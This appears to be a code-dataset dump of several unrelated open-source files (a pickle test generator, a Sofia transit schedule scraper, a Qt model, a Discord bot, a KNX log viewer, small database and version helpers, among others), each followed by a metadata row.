print("jpickle.emulated['__main__.MyClass'] = MyClass;\n" \
"jpickle.emulated['__main__.MyOtherClass'] = MyOtherClass;\n" \
"jpickle.emulated['__main__.MySubClass'] = MySubClass;\n\n", file = testfile )
print("\ndescribe('pickle version 2 classes', function() {\n", file = testfile )
print(" it('should decode simple classes', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded instanceof MyClass, true);\n" \
" assert.strictEqual(decoded.data, 'test');\n" \
" });\n\n" % pickle.dumps( myclass, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode simple classes in a container', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded['myclass1'] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded['myclass2'] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded['myclass1'].data, 'new test value 1');\n" \
" assert.strictEqual(decoded['myclass2'].data, 'new test value 2');\n" \
" });\n\n" % pickle.dumps( myclassescontainer, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode classes containing classes', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded instanceof MyOtherClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0].data, 'new test value');\n" \
" assert.strictEqual(decoded.myclass.data, 'test');\n" \
" });\n\n" % pickle.dumps( myotherclass, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode a subclass and a superclass', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded instanceof MyOtherClass, true);\n" \
" assert.strictEqual(decoded instanceof MySubClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0].data, 'new test value');\n" \
" assert.strictEqual(decoded.myclass.data, 'test');\n" \
" assert.strictEqual(decoded.subvalue, 12);\n" \
" });\n\n" % pickle.dumps( mysubclass, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode classes containing method', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded.mymethod(), 'test foo!');\n" \
" });\n\n" % pickle.dumps( myotherclass, protocol=2 ).encode('string-escape'), file = testfile )
print("});\n\n", file = testfile ) | mit | 8,166,288,575,835,632,000 | 43.815217 | 111 | 0.600194 | false | 3.359413 | true | false | false |
PuloV/sofiatraffic-api | st_parser.py | 1 | 9580 | import requests
import re
import time
from html.parser import HTMLParser
import json
import os
import datetime
from multiprocessing.dummy import Pool as ThreadPool
class PageParsing:
"""Parsing class with static methods"""
MAIN_PAGE = "http://schedules.sofiatraffic.bg/"
TRANSPORT_RE = '(tramway|trolleybus|autobus){1}'
@classmethod
def parse_schedule_buttons(cls, content):
# get all schedule btn ids from the content
SCHEDULE_BTN_ID_RE = 'id="schedule_\d*_button"'
schedule_btns = re.findall(SCHEDULE_BTN_ID_RE, content)
# contains the found schedule ids
btns = []
for btn in schedule_btns:
schedule_id = btn.replace('id="schedule_', "")
schedule_id = schedule_id.replace('_button"', "")
btns.append(schedule_id)
return btns
@classmethod
def parse_schedule_name(cls, content, schedule_id):
# get the schedule name like "делник" / "предпразник / празник"
SCHEDULE_BTN_RE = 'id="schedule_{}_button".*?>.*?</a>'.format(schedule_id)
SCHEDULE_BTN_TITLE_RE = '<span>.*?</span>'
schedule_btn = re.findall(SCHEDULE_BTN_RE, content)[-1]
schedule_title = re.findall(SCHEDULE_BTN_TITLE_RE, schedule_btn)[-1]
schedule_title = schedule_title.replace("<span>", "")
schedule_title = schedule_title.replace("</span>", "")
return schedule_title
@classmethod
def check_is_weekly_schedule(cls, schedule):
		# compare against the UTF-8 byte sequence for "делник" ("weekday");
		# the plain string comparison below did not match the parsed title,
		# so the raw byte literal is used instead:
		# return schedule == "делник"
return schedule == b'\xd0\xb4\xd0\xb5\xd0\xbb\xd0\xbd\xd0\xb8\xd0\xba'
@classmethod
def parse_routes_stops(cls, content):
# get all stations from the content
STOPS_LI_RE = '<li class="\s+stop_\d*">.*?</li>'
STOP_NAME_A_RE = '<a .*? class="stop_change".*?>.*?</a>'
STOP_NAME_RE = '>.*?<'
STOP_HREF_A_RE = '<a.*?class="stop_link".*?>.*?</a>'
STOP_HREF_RE = 'id=".*?"'
stops_li = re.findall(STOPS_LI_RE, content)
# contains the found stops
stops = []
for stop_li in stops_li:
# get the first (and only) stop name a tag
stop_name_a = re.findall(STOP_NAME_A_RE, stop_li).pop()
# get the first (and only) stop name from a tag
stop_name = re.findall(STOP_NAME_RE, stop_name_a).pop()
stop_name = stop_name.replace(">", "")
stop_name = stop_name.replace("<", "")
# get the first (and only) stop href a tag
stop_href_a = re.findall(STOP_HREF_A_RE, stop_li).pop()
# get the first (and only) stop href from a tag
stop_href = re.findall(STOP_HREF_RE, stop_href_a).pop()
stop_href = stop_href.replace('id="', "")
stop_href = stop_href.replace('"', "")
ids = re.findall("\d{1,}", stop_href)
stops.append({
"stop_name": stop_name,
"schedule": "",
"direction": "",
"stop_no": ids[2]
})
return stops
@classmethod
def parse_routes_times(cls, content):
		# get all time-formatted strings (e.g. "12:35") from the content
		TIME_RE = r'\d{0,2}:\d{2}'
		time_results = re.findall(TIME_RE, content)
		return time_results
@classmethod
def generate_route_stops_url(cls, schedule, direction, stop_no):
# "server/html/schedule_load/4018/1165/1254"
return "server/html/schedule_load/{}/{}/{}".format(schedule, direction, stop_no)
@classmethod
def parse_route_direction(cls, content, route):
# collect data for the directions of the route
DIRECTIONS_RE = '<a href="/{}#direction/\d*" id="schedule_direction_\d*_\d*_button" class=".*?schedule_view_direction_tab">.*?</a>'.format(route)
directions_result = re.findall(DIRECTIONS_RE, content)
directions = set()
# parse the data of the directions
for direction in directions_result:
# get the route url
URL_RE = '/\w*/.*?/\d*'
url_result = re.search(URL_RE, direction)
url = url_result.group(0)
url = url.replace("/", "", 1)
# get the route title
TITLE_RE = 'n>.*?<'
title_result = re.search(TITLE_RE, direction)
title = title_result.group(0)
title = title.replace("n>", "")
title = title.replace("<", "")
directions.add((url, title))
return directions
@classmethod
def get_route_stations(cls, route):
# get all stations by schedule directions for the route
time_last = time.time()
route_url = "{}{}".format(cls.MAIN_PAGE, route)
r = requests.get(route_url)
content = "{}".format(r.content)
# get all times for this route
stops = cls.parse_routes_stops(content)
# get the schedule buttons for the current route
schedules = cls.parse_schedule_buttons(content)
# get the directions for the current route
directions = cls.parse_route_direction(content, route)
direction_stops_times = []
for schedule in schedules:
# get the schedule type name
schedule_name = cls.parse_schedule_name(content, schedule)
for direction in directions:
# get the direction id
direction_id = re.findall("\d{1,}", direction[0]).pop()
for stop in stops:
# set the direction and schedule
stop["schedule"] = schedule_name
stop["direction"] = direction[1]
# get the url for this stop
stop_url = cls.generate_route_stops_url(schedule, direction_id, stop["stop_no"])
stop_url = "{}{}".format(cls.MAIN_PAGE, stop_url)
sr = requests.get(stop_url)
stop_content = "{}".format(sr.content)
# check for wrong request with empty body
if stop_content == "":
continue
# get all times for this route
schedule_times = cls.parse_routes_times(stop_content)
# check for wrong request with empty body
if len(schedule_times) == 0:
continue
direction_stops_times.append({
"url": stop_url,
"times": schedule_times,
"schedule_id": schedule,
"weekly_schedule": cls.check_is_weekly_schedule(schedule_name),
"direction_id": direction_id,
"stop": {
"schedule": schedule_name,
"direction": direction[1],
"stop_name": stop["stop_name"],
"stop_no": stop["stop_no"]
}
})
# print(json.dumps(direction_stops_times))
today = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')
json_file = "{}/{}.json".format(today, route.replace("/", "_"))
temp_file = open(json_file, 'w')
temp_file.write(json.dumps(direction_stops_times))
temp_file.close()
current_time = time.time()
print(json_file, current_time - time_last)
return direction_stops_times
@classmethod
def run_thread(cls, url):
# function that runs in the threads
line = list(url.keys())[0]
return cls.get_route_stations(url.get(line))
@classmethod
def parse_traffic_links(cls, content):
# get all transport page urls from the content
class TransportLinksParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.recording = 0
self.data = []
self.link = ""
def handle_starttag(self, tag, attributes):
if tag != 'a':
return
for name, val in attributes:
if name == 'href' and re.match(cls.TRANSPORT_RE, val):
self.recording += 1
self.link = val
break
else:
self.link = ""
def handle_endtag(self, tag):
if tag == 'a' and self.recording:
self.recording -= 1
def handle_data(self, data):
if self.recording and self.link != "":
self.data.append({data: self.link})
lp = TransportLinksParser()
lp.feed(content)
return lp.data
@classmethod
def parse_main_page(cls):
		# get the main page and crawl ...
r = requests.get(cls.MAIN_PAGE)
content = "{}".format(r.content)
urls = cls.parse_traffic_links(content)
today = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')
if not os.path.exists(today):
os.mkdir(today)
		# crawl in 4 threads
pool = ThreadPool(4)
pool.map(cls.run_thread, urls)
if __name__ == '__main__':
time_last = time.time()
print("Started parsing the {} website!".format(PageParsing.MAIN_PAGE))
PageParsing.parse_main_page()
current_time = time.time()
print("Parsed for {} seconds".format(current_time - time_last))
| gpl-2.0 | -1,020,988,815,074,494,200 | 35.872587 | 153 | 0.533717 | false | 4.005872 | false | false | false |
TresysTechnology/setools | setoolsgui/genfsconmodel.py | 2 | 1842 | # Copyright 2016, Tresys Technology, LLC
#
# This file is part of SETools.
#
# SETools is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1 of
# the License, or (at your option) any later version.
#
# SETools is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SETools. If not, see
# <http://www.gnu.org/licenses/>.
#
import stat
from PyQt5.QtCore import Qt
from .models import SEToolsTableModel
class GenfsconTableModel(SEToolsTableModel):
"""Table-based model for genfscons."""
headers = ["FS Type", "Path", "File Type", "Context"]
_filetype_to_text = {
0: "Any",
stat.S_IFBLK: "Block",
stat.S_IFCHR: "Character",
stat.S_IFDIR: "Directory",
stat.S_IFIFO: "Pipe (FIFO)",
stat.S_IFREG: "Regular File",
stat.S_IFLNK: "Symbolic Link",
stat.S_IFSOCK: "Socket"}
def data(self, index, role):
if self.resultlist and index.isValid():
row = index.row()
col = index.column()
rule = self.resultlist[row]
if role == Qt.DisplayRole:
if col == 0:
return rule.fs
elif col == 1:
return rule.path
elif col == 2:
return self._filetype_to_text[rule.filetype]
elif col == 3:
return str(rule.context)
elif role == Qt.UserRole:
return rule
| lgpl-2.1 | -7,367,100,566,871,772,000 | 30.220339 | 66 | 0.606949 | false | 3.927505 | false | false | false |
alexandershuping/cabbage-bot | cabbage.py | 1 | 2905 | import cabbagerc
import discord
from discord.ext import commands
from phrasebook.Phrasebook import Phrasebook
from datetime import datetime
cabbageNumber = 2
cabbageStealer = 0
cabbageTheftTime = 0
description = '''Bot That Performs Cabbage-Related Functions'''
bot = commands.Bot(command_prefix=cabbagerc.PREF, description=description)
modules = [
'mod.roller.roller',
'mod.trump.trump',
'mod.admin.admin',
'mod.poll.poll',
'mod.starboard.starboard',
'mod.scp.scp'
]
def autoset():
''' Setup functions '''
global modules
for mod in modules:
bot.load_extension(mod)
def timeStrSince(d):
diff = datetime.now() - d
ts = int(diff.total_seconds())
con = ''
if ts == 0:
return 'just now'
con += str(ts % 60) + ' seconds'
minute = int(ts/60)
if minute == 0:
return con
con = str(minute % 60) + ' minutes and ' + con
hour = int(minute/60)
if hour == 0:
return con
con = str(hour % 24) + ' hours, ' + con
	day = int(hour / 24)
if day == 0:
return con
con = str(day) + ' days, ' + con
return con
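# Hedged illustration (editor's addition, not part of the original bot):
# timeStrSince() composes a human readable age string from a past datetime.
# The 3 minute 20 second offset below is invented for the example.
def demoTimeStrSince():
	from datetime import timedelta
	d = datetime.now() - timedelta(minutes=3, seconds=20)
	print(timeStrSince(d))  # e.g. "3 minutes and 20 seconds"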
@bot.event
async def on_ready():
print('CABBAGE IS ONLINE')
print('USER: ' + bot.user.name + ' [' + bot.user.id + ']')
print('=================')
@bot.command(pass_context=True)
async def intro(ctx):
''' Test Command '''
p = Phrasebook(ctx, bot)
await bot.say(p.pickPhrase('core', 'intro1'))
await bot.say(p.pickPhrase('core', 'intro2'))
@bot.command(pass_context=True)
async def cabbages(ctx):
''' Displays the current number of cabbages '''
p = Phrasebook(ctx, bot)
global cabbageNumber
global cabbageStealer
global cabbageTheftTime
print('User ' + str(ctx.message.author) + ' requested cabbage count (currently ' + str(cabbageNumber) + ')')
if datetime.now().hour < 5:
await bot.say(p.pickPhrase('cabbage', 'checkLate'))
return
if cabbageNumber == 0:
await bot.say(p.pickPhrase('cabbage', 'checkOut', cabbageStealer, timeStrSince(cabbageTheftTime)))
else:
await bot.say(p.pickPhrase('cabbage', 'check', cabbageNumber))
@bot.command(pass_context=True)
async def takeCabbage(ctx):
''' Take a cabbage for yourself
Be careful, though: once the cabbages are gone, they're gone until I restart. '''
p = Phrasebook(ctx, bot)
global cabbageNumber
global cabbageStealer
global cabbageTheftTime
print('User ' + str(ctx.message.author) + ' took cabbage (now ' + str(cabbageNumber-1) + ')')
if cabbageNumber > 1:
cabbageNumber = cabbageNumber - 1
if cabbageNumber > 100:
await bot.say(p.pickPhrase('cabbage', 'takePlenty', cabbageNumber))
else:
await bot.say(p.pickPhrase('cabbage', 'take', cabbageNumber))
elif cabbageNumber == 1:
cabbageNumber = 0
await bot.say(p.pickPhrase('cabbage', 'takeLast'))
cabbageStealer = ctx.message.author
cabbageTheftTime = datetime.now()
else:
await bot.say(p.pickPhrase('cabbage', 'checkOut', cabbageStealer.name, timeStrSince(cabbageTheftTime)))
autoset()
bot.run(cabbagerc.TKN)
| mit | 4,933,143,436,424,292,000 | 23.82906 | 109 | 0.689845 | false | 2.714953 | false | false | false |
DigitalSlideArchive/large_image | girder/girder_large_image/loadmodelcache.py | 1 | 3260 | #############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#############################################################################
import cherrypy
import time
from girder.api.rest import getCurrentToken
from girder.utility.model_importer import ModelImporter
LoadModelCache = {}
LoadModelCacheMaxEntries = 100
LoadModelCacheExpiryDuration = 300 # seconds
def invalidateLoadModelCache(*args, **kwargs):
"""
Empty the LoadModelCache.
"""
LoadModelCache.clear()
def loadModel(resource, model, plugin='_core', id=None, allowCookie=False,
level=None):
"""
Load a model based on id using the current cherrypy token parameter for
authentication, caching the results. This must be called in a cherrypy
context.
:param resource: the resource class instance calling the function. Used
for access to the current user and model importer.
:param model: the model name, e.g., 'item'.
:param plugin: the plugin name when loading a plugin model.
:param id: a string id of the model to load.
:param allowCookie: true if the cookie authentication method is allowed.
:param level: access level desired.
:returns: the loaded model.
"""
key = tokenStr = None
if 'token' in cherrypy.request.params: # Token as a parameter
tokenStr = cherrypy.request.params.get('token')
elif 'Girder-Token' in cherrypy.request.headers:
tokenStr = cherrypy.request.headers['Girder-Token']
elif 'girderToken' in cherrypy.request.cookie and allowCookie:
tokenStr = cherrypy.request.cookie['girderToken'].value
key = (model, tokenStr, id)
cacheEntry = LoadModelCache.get(key)
if cacheEntry and cacheEntry['expiry'] > time.time():
entry = cacheEntry['result']
cacheEntry['hits'] += 1
else:
# we have to get the token separately from the user if we are using
# cookies.
if allowCookie:
getCurrentToken(allowCookie)
cherrypy.request.girderAllowCookie = True
entry = ModelImporter.model(model, plugin).load(
id=id, level=level, user=resource.getCurrentUser())
# If the cache becomes too large, just dump it -- this is simpler
# than dropping the oldest values and avoids having to add locking.
if len(LoadModelCache) > LoadModelCacheMaxEntries:
LoadModelCache.clear()
LoadModelCache[key] = {
'id': id,
'model': model,
'tokenId': tokenStr,
'expiry': time.time() + LoadModelCacheExpiryDuration,
'result': entry,
'hits': 0
}
return entry
| apache-2.0 | 1,900,438,198,414,110,700 | 38.277108 | 77 | 0.645092 | false | 4.272608 | false | false | false |
TrondKjeldas/knxmonitor | knxmonitor/Knx/KnxLogViewer.py | 1 | 7940 | from time import time, mktime, strptime
import hashlib
import sys
from knxmonitor.Knx.KnxParseException import KnxParseException
from knxmonitor.Knx.KnxParser import KnxParser
class KnxLogViewer(object):
def _readLinesFromFileOrCache(self, infile):
try:
inf = infile
except IOError:
print "%s: Unable to read file: %s" %(sys.argv[0], infile.name)
sys.exit(1);
except:
op.print_help()
sys.exit(1);
print "Reading file: %s" % infile.name
l = inf.readlines()
inf.close()
# Ok, so now we have the file content. However, parsing it
# is expensive, so look for an already parsed cache of the file.
        # The cache file's first line is the MD5 sum of the infile, which
        # we use to see if the cache is up to date. If it is not, re-parse
        # the whole input file and update the cache. A future enhancement could be
# to use the part of the cache file that is already there.
hsh = hashlib.md5()
for ll in l:
hsh.update(ll)
infile_md5 = hsh.hexdigest()
cachename = infile.name.replace(".hex",".cache")
try:
inf = open(cachename, "r")
clines = inf.readlines()
cache_md5 = clines.pop(0).strip()
if cache_md5 == infile_md5:
# Ok, seems good...
print "Using cached input for file %s" %infile.name
return (None, infile_md5, clines)
else:
print "Cached file found, but hash mismatch"
print "FILE: %s" %infile_md5
print "CACHE: %s" %cache_md5
except IOError:
# No luck in getting cached input, just use the new...
print "No cached input for file %s found..." %infile.name
return (cachename, infile_md5, l)
def __init__(self, devicesfilename, groupaddrfilename, infiles,
dumpGAtable, types, flanksOnly, tail, groupAddressSet = None,
hourly_avg = False, start_time=None):
self.delta = 0
self.delta2 = 0
self.pduCount = 0
self.pduSkipped = 0
self.h_avg = hourly_avg if hourly_avg != None else False
self.dbgMsg = "groupAddressSet = %s" %str(groupAddressSet)
start = time()
#
# Read in all the files...
#
lines = []
lines_meta = []
start = 1
for infile in infiles:
cachename, hash, newLines = self._readLinesFromFileOrCache(infile)
lines.extend(newLines)
lines_meta.append( (infile.name, cachename, hash,
start, len(newLines) ) )
start += len(newLines)
print "Creating parser..."
self.knx = KnxParser(devicesfilename, groupaddrfilename,
dumpGAtable, flanksOnly, types)
if tail != 0:
if tail < len(lines):
lines = lines[len(lines) - tail :]
if start_time != None:
self.found_start = "Trying to locate start time..."
print "Trying to locate start time..."
for i in range(len(lines)-1, 0, -1):
try:
timestamp, pdu = lines[i].split(":LPDU:")
except ValueError:
timestamp, pdu = lines[i].split("LPDU:")
ts = mktime(strptime(timestamp, "%a %b %d %H:%M:%S %Y"))
if ts < start_time:
print "Found start time!"
self.found_start = "Found start time!"
lines = lines[i+1:]
break
else:
self.found_start = "not relevant"
#
# Parsing the input...
#
basetime = 0
lineNo = 0
origfilename, cachefilename, hash, startLine, numLines = lines_meta.pop(0)
for line in lines:
# Skip empty lines...
if len(line.strip()) < 1:
continue
# If filter specified, skip unwanted GAs
if groupAddressSet != None:
ignore = True
for ga in groupAddressSet:
if line.find(ga) != -1:
ignore = False
break
if ignore:
self.pduSkipped += 1
continue
lineNo += 1
# Differentiate between parsing new files and loading cached input
if line[:2] == "@@":
pass
#print "loading: %s" %line.strip().decode("utf-8")
else:
# Split timestamp from rest...
try:
timestamp, pdu = line.split(":LPDU:")
except ValueError:
timestamp, pdu = line.split("LPDU:")
try:
if basetime == 0:
basetime = mktime(strptime(timestamp,
"%a %b %d %H:%M:%S %Y"))
self.knx.setTimeBase(basetime)
except ValueError:
printVerbose("timestamp error: %s" %timestamp)
try:
self.knx.parseVbusOutput(lineNo, timestamp, pdu)
self.pduCount += 1
except KnxParseException:
print "Failed: %s: %s" %(lineNo, pdu)
sys.exit(1)
# Check if we are into a new file, in which case we should
# potentially update the cache file for the last file...
# Note that the --tail option disables creation of cache files
if (tail == 0) and lineNo == startLine + numLines - 1:
if cachefilename != None:
print "update cache file for %s (%s) at %s" %(origfilename,
cachefilename,
lineNo)
try:
of = open(cachefilename, "w")
except IOError:
print cachefilename
else:
# write hash at first line
of.write("%s\n" % hash)
self.knx.storeCachedInput(of, startLine)
# Shift meta data to new file...
try:
origfilename, cachefilename, hash, startLine, numLines = lines_meta.pop(0)
except:
print "Last file done, line no (%s)" %lineNo
origfilename, cachefilename, hash, startLine, numLines = (None, None, None, None, None)
if lineNo % 10000 == 0:
print "Parsed %d lines..." %lineNo
print "Parsed %d lines..." %lineNo
self.dbgMsg += "Parsed %d lines..." %lineNo
self.delta = time() - start
def getPerfData(self):
s = "<p>"
s += "found_start: %s<p>"%self.found_start
if self.delta != 0:
s += "KnxLogViewer: Time used for init: %f (%d PDUs parsed, %d skipped)<p>" %(self.delta, self.pduCount, self.pduSkipped)
s += "Debug: %s<p>GlobalDebug:%s<p>" %(self.dbgMsg, globDbgMsg)
self.delta = 0
s += "KnxLogViewer: Time used for plotgen: %f<p>" %self.delta2
s += "<p>"
return s
def getMinMaxValues(self, groupAddr):
return self.knx.getStreamMinMaxValues(groupAddr)
def plotLog(self, groupAddrs, plotImage, addHorLine=None):
start = time()
self.knx.plotStreams(groupAddrs, plotImage, addHorLine)
self.delta2 = time() - start
def printLog(self, groupAddrs):
self.knx.printStreams(groupAddrs)
def printJSON(self, groupAddrs):
self.knx.printStreams(groupAddrs, "JSON")
| gpl-2.0 | 8,517,884,473,717,793,000 | 34.288889 | 136 | 0.496348 | false | 4.271114 | false | false | false |
glasslion/SPF | spf/core/mydb.py | 6 | 3569 | #!/usr/bin/env python
import sqlite3
import sys
from utils import Utils
class MyDB():
def __init__(self, sqlite_file):
self.sqlite_file = sqlite_file + "spf.sqlite"
#print self.sqlite_file
self.conn = None
if (not self.checkDB()):
self.initDB()
def getCursor(self):
if (self.conn == None):
#print self.sqlite_file
try:
self.conn = sqlite3.connect(self.sqlite_file)
except sqlite3.OperationalError as e:
print e
except:
print sys.exc_info()[0]
return self.conn.cursor()
def checkDB(self):
try:
cursor = self.getCursor()
except:
print sys.exc_info()[0]
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='users'")
if cursor.fetchone() is None:
return False
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='hosts'")
if cursor.fetchone() is None:
return False
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='web_templates'")
if cursor.fetchone() is None:
return False
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='ports'")
if cursor.fetchone() is None:
return False
return True
def initDB(self):
cursor = self.getCursor()
cursor.execute("DROP TABLE IF EXISTS users")
cursor.execute("CREATE TABLE users(user TEXT)")
cursor.execute("DROP TABLE IF EXISTS hosts")
cursor.execute("CREATE TABLE hosts(name TEXT, ip TEXT)")
cursor.execute("DROP TABLE IF EXISTS web_templates")
cursor.execute("CREATE TABLE web_templates(ttype TEXT, src_url TEXT, tdir TEXT)")
cursor.execute("DROP TABLE IF EXISTS ports")
cursor.execute("CREATE TABLE ports(port INTEGER, host TEXT)")
self.conn.commit()
return
def addUser(self, user):
cursor = self.getCursor()
cursor.execute('INSERT INTO users VALUES(?)', (user,))
self.conn.commit()
return
def addUsers(self, users):
for user in users:
self.addUser(user)
return
def addHost(self, name, ip=""):
cursor = self.getCursor()
cursor.execute('INSERT INTO hosts VALUES(?,?)', (name, ip,))
self.conn.commit()
return
def addHosts(self, hosts):
for host in hosts:
self.addHost(host)
return
def addPort(self, port, host):
cursor = self.getCursor()
cursor.execute('INSERT INTO ports VALUES(?,?)', (port, host,))
self.conn.commit()
return
def addWebTemplate(self, ttype, src_url, tdir):
cursor = self.getCursor()
cursor.execute('INSERT INTO web_templates VALUES(?,?,?)', (ttype, src_url, tdir,))
self.conn.commit()
return
def getUsers(self):
users = []
cursor = self.getCursor()
cursor.execute('SELECT user FROM users')
for row in cursor.fetchall():
users.append(row[0])
return Utils.unique_list(users)
def getWebTemplates(self, ttype="static"):
templates = []
cursor = self.getCursor()
cursor.execute('SELECT src_url, tdir FROM web_templates WHERE ttype=?', (ttype,))
for row in cursor.fetchall():
templates.append(str(row[1])+"[-]"+str(row[0]))
return Utils.unique_list(templates)
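# Hedged usage sketch (editor's addition, not part of the original module):
# exercising MyDB directly. Note that the constructor treats its argument as a
# path prefix and appends "spf.sqlite" to it; the prefix and sample values
# below are invented.
if __name__ == '__main__':
    demo_db = MyDB('/tmp/spf_demo_')
    demo_db.addUsers(['alice@example.com', 'bob@example.com'])
    demo_db.addHost('mail.example.com', '192.0.2.10')
    demo_db.addWebTemplate('static', 'http://www.example.com/login', '/tmp/example_template')
    print demo_db.getUsers()
    print demo_db.getWebTemplates('static')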
| bsd-3-clause | -3,159,035,181,884,819,500 | 30.584071 | 100 | 0.581676 | false | 4.213695 | false | false | false |
ZombieNinjaPirate/pypkg | System/Output.py | 1 | 1714 | """
Copyright (c) 2014, Are Hansen - Honeypot Development.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted
provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions
and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions
and the following disclaimer in the documentation and/or other materials provided with the
distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND AN EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
__author__ = 'Are Hansen'
__date__ = '2014, Aug 3'
__version__ = '0.0.1'
def fwIRC(data_out):
"""Processes and outputs the results of the firewall.log's parsing for IRC dest. """
print '\n ========= IRC Destinations ========='
for irc, detail in data_out.items():
print ' IRC address: {0:>23}'.format(irc)
for info in detail:
print ' - {0}'.format(info)
print '' | gpl-3.0 | 2,196,115,010,699,529,200 | 42.974359 | 100 | 0.755543 | false | 4.211302 | false | false | false |
bayesimpact/bob-emploi | data_analysis/importer/departements.py | 1 | 1293 | """Importer of French Département data in MongoDB."""
import typing
from typing import Any, Dict, List
from bob_emploi.data_analysis.lib import cleaned_data
from bob_emploi.data_analysis.lib import mongo
def make_dicts(
french_departements_tsv: str, french_oversea_departements_tsv: str, prefix_tsv: str) \
-> List[Dict[str, Any]]:
"""Import départements info in MongoDB.
Args:
french_departements_tsv: path to a TSV file containing the main
information about départements from INSEE.
french_oversea_departements_tsv: path to a TSV file containing the
information about oversea collectivities.
prefix_tsv: path to a TSV file containing the prefix for each
département.
Returns:
A list of dict that maps the JSON representation of Departement protos.
"""
departements = cleaned_data.french_departements(
filename=french_departements_tsv,
oversea_filename=french_oversea_departements_tsv,
prefix_filename=prefix_tsv)
departements['_id'] = departements.index
return typing.cast(
List[Dict[str, Any]], departements[['_id', 'name', 'prefix']].to_dict('records'))
if __name__ == '__main__':
mongo.importer_main(make_dicts, 'departements')
| gpl-3.0 | 1,295,578,880,730,163,200 | 34.805556 | 94 | 0.6827 | false | 3.465054 | false | false | false |
erickeller/edi | edi/lib/versionhelpers.py | 1 | 2219 | # -*- coding: utf-8 -*-
# Copyright (C) 2017 Matthias Luescher
#
# Authors:
# Matthias Luescher
#
# This file is part of edi.
#
# edi is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# edi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with edi. If not, see <http://www.gnu.org/licenses/>.
import os
import pkg_resources
import re
import logging
from edi.lib.helpers import FatalError
# The do_release script will update this version!
# During debuild neither the git version nor the package version is available.
edi_fallback_version = '0.4.5'
def get_edi_version():
"""
Get the version of the current edi installation or the version derived from git.
:return: full edi version string
"""
project_root = os.path.abspath(os.path.join(os.path.dirname(__file__), "../.."))
git_dir = os.path.join(project_root, ".git")
if os.path.isdir(git_dir):
# do import locally so that we do not depend on setuptools_scm for the released version
from setuptools_scm import get_version
return get_version(root=project_root)
else:
try:
return pkg_resources.get_distribution('edi').version
except pkg_resources.DistributionNotFound:
logging.warning('Using fallback version {}.'.format(edi_fallback_version))
return edi_fallback_version
def get_stripped_version(version):
"""
Strips the suffixes from the version string.
:param version: Version string that needs to be parsed
:return: a stripped version string of the format MAJOR[.MINOR[.PATCH]]
"""
    result = re.match(r'\d+(\.\d+){0,2}', version)
if result:
return result.group(0)
else:
raise FatalError('''Unable to parse version '{}'.'''.format(version))
| lgpl-3.0 | -3,946,882,244,747,981,000 | 33.671875 | 95 | 0.695358 | false | 3.927434 | false | false | false |
clebergnu/arc | arc/cli/app.py | 1 | 6728 | """
This is the main entry point for the ARC cli application
"""
import sys
import types
import logging
import importlib
import functools
import arc.config
import arc.connection
import arc.defaults
import arc.cli.args.parser
__all__ = ['App']
class App(object):
